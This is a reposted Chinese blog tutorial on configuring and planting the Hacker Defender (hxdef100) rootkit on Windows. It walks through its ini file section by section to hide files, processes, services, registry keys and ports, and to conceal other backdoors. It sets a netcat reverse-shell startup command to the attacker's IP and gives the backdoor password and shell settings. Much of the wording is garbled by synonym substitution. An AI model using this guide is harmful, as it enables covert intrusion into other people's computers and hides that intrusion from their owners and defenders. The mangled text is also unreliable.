Hxdef100的配置和使用方法

  转自：cnbird's blog
  下载来的Hxdef100具有以下文件
  1. bdcli100.exe    自带后食客户端毗连文件
  2. hxdef100.exe    Hxdef100后门主步伐
  3. hxdef100.2.ini  配置文件模板
  4. hxdef100.ini    经过简略加密的配置文件模板
  打开hxdef.2.ini ，我们可以看到它的默许配置选项，首先，我们先对[Hidden Table]项进行配置，
  [Hidden Table]是要隐藏的列表，写在这个目次下的字符串，不论是作为文件名照旧目次名，
  都将不在Windows的使命管理器、资源管理器中呈现，而且支持通配符，一行一个。
  比方：
  [Hidden Table]
  hxdef*            /*隐藏所有以hxdef扫尾的文件名、目次名等
  rcmd.exe          /*隐藏rcmd.exe文件
  -----------------------------------------
  下一步，便是
  [Root Processes]这里是配置要隐藏能在历程管理器中表现的历程名，同样支持通配符。
  比方：
  [Root Processes]
  hxdef*            /*隐藏所有以hxdef扫尾的所有历程
  rcmd.exe          /*隐藏rcmd.exe文件历程
  ------------------------------------------
  [Hidden Services]项目，是所要隐藏的服务列表，hxdef非但可以隐藏自身，而且还可以为其他后门、步伐提供隐藏服务。
  首先当然是隐藏自身了，而后是其他的服务，支持通配符，一行一个。
  比方：
  [Hidden Services] 
  Hackerdefender*   /*这个是你的hxdef的服务名
  SVCH0ST           /*这个是我的网络神偷免杀版的服务名，谁人o实在是数字0
  ----------------------------------------------
  [Hidden RegKeys]隐藏RegKeys列表，我们天家的服务都是在Hkey_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\Services
  找到对应的注册表项，以是为了做到彻底隐藏，我们就要将隐藏进行究竟，
  比方：
  [Hidden RegKeys]
  Hackerdefender100  /*默许服务名
  LEGACY_Hackerdefender100   /*LEGACY加hxdef的服务名
  HackerdefenderDrv100       /*hxdef的默许驱动名
  LEGACY_HackerdefenderDrv100   /*LEGACY加HackerdefenderDrv100的服务名
  其他的服务也如此添加，差别服务应该对应自身的服务名。
  ---------------------------------------------
  [Startup Run]
  nc -e %windir%\system\cmd.exe 你的ip 端口
  这里容许使用诸如%windir%   %tmpdir% 等环境变量。
  --------------------------------------------
  [Hidden Ports]
  TCP:2004,8922,9333    /*要隐藏的TCP协议端口
  UDP:2004,8922,9333    /*要隐藏的UDP协议端口
  ---------------------------------------------
  [Settings] hxdef 的设置部分，可以设置hxdef的服务名，形貌，表现名等。设置方法如下：
  [Settings]
  Password=eyas.126.com                         /*后门毗连暗码
  BackdoorShell=stdio?.exe                      /*后门毗连后，会将cmd.exe复制一份，每个毗连复制一份，？为通配符。毗连完毕后，主动删除。
  FileMappingName=_.-=[Hacker Defender]=-._
  ServiceName=HackerDefender100                 /*hxdef的服务名，要和下面的[Hidden Services]项对应！
  ServiceDisplayName=HXD Service 100            /*hxdef的服务表现名
  ServiceDescription=powerfui NT rookit         /*hxdef的服务形貌
  DriverName=HackerDefenderDrv100               /*hxdef驱动名
  DriverFileName=hxdefdrv.sys                   /*hxdef驱动文件名
  -------------------------------------------
  [Comments]为解释部分，由于hxdef100的配置文件为.ini，以是一定要把[Hidden Table]项目填写精确完全，
  尤其把这个.ini文件也要隐藏掉，否则你就等着忧郁吧！
  ----------------------------------------------
  以上我们晓得了hxdef的配制方法，在种后门的时候，还需要细致以下的几个开关选项及事项：
  -：installonly             /*仅仅进行安置服务，并差别步运转
  -：refresh                 /*重新读取ini设置
  -：noservice               /*正常运转，但是不安置服务，重新启动的时候恢复， 做测试的时候用
  -：uninstall               /*将hxdef移出内存，而且断开所有毗连和卸载服务
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：